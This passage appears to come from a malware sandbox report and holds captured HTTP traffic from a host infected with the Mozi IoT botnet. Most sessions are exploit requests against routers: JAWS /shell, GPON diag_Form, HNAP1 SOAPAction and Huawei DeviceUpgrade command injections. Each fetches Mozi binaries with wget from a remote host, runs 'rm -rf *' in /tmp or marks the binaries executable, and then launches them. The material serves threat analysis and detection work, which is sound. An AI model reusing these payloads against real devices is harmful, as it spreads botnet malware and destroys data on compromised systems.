67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        19192.168.2.203344023.207.67.8880
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:28.182343006 CEST587OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 23.207.67.88:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 21:00:28.330233097 CEST588INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 208
                                                                                                                        Expires: Sun, 25 Apr 2021 19:00:28 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:28 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 37 66 39 31 34 30 32 26 23 34 36 3b 31 36 31 39 33 37 37 32 32 38 26 23 34 36 3b 32 35 62 32 66 37 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;87f91402&#46;1619377228&#46;25b2f7e</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        2192.168.2.2046712104.85.180.16880
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:11.094934940 CEST149OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:11.153685093 CEST151INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 209
                                                                                                                        Expires: Sun, 25 Apr 2021 18:59:11 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:11 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 66 39 62 37 62 35 63 26 23 34 36 3b 31 36 31 39 33 37 37 31 35 31 26 23 34 36 3b 32 39 61 33 36 64 64 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;df9b7b5c&#46;1619377151&#46;29a36dd8</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        20192.168.2.2043164146.158.12.480
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:31.158554077 CEST607OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 146.158.12.4:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 21:00:31.243772984 CEST608INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:31 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 153
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        21192.168.2.203603423.217.112.10580
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:32.314532042 CEST611OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 23.217.112.105:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 21:00:32.599731922 CEST612INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 209
                                                                                                                        Expires: Sun, 25 Apr 2021 19:00:32 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:00:32 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 64 32 38 32 38 31 37 26 23 34 36 3b 31 36 31 39 33 37 37 32 33 32 26 23 34 36 3b 31 64 66 31 35 61 33 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;dd282817&#46;1619377232&#46;1df15a38</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        22192.168.2.2053656168.184.43.2237215
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:40.194431067 CEST646OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                                                                        Host: 168.184.43.22:37215
                                                                                                                        Content-Length: 601
                                                                                                                        Connection: keep-alive
                                                                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                                                                        Apr 25, 2021 21:00:40.660793066 CEST646OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                                                                        Host: 168.184.43.22:37215
                                                                                                                        Content-Length: 601
                                                                                                                        Connection: keep-alive
                                                                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                                                                        Apr 25, 2021 21:00:41.596676111 CEST649OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                                                                        Host: 168.184.43.22:37215
                                                                                                                        Content-Length: 601
                                                                                                                        Connection: keep-alive
                                                                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        23192.168.2.2049646175.234.128.978080
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:46.343457937 CEST680OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:8080
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                                        Apr 25, 2021 21:00:46.609477043 CEST680INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 30
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        24192.168.2.205088644.239.233.22980
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:00:49.254401922 CEST691OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
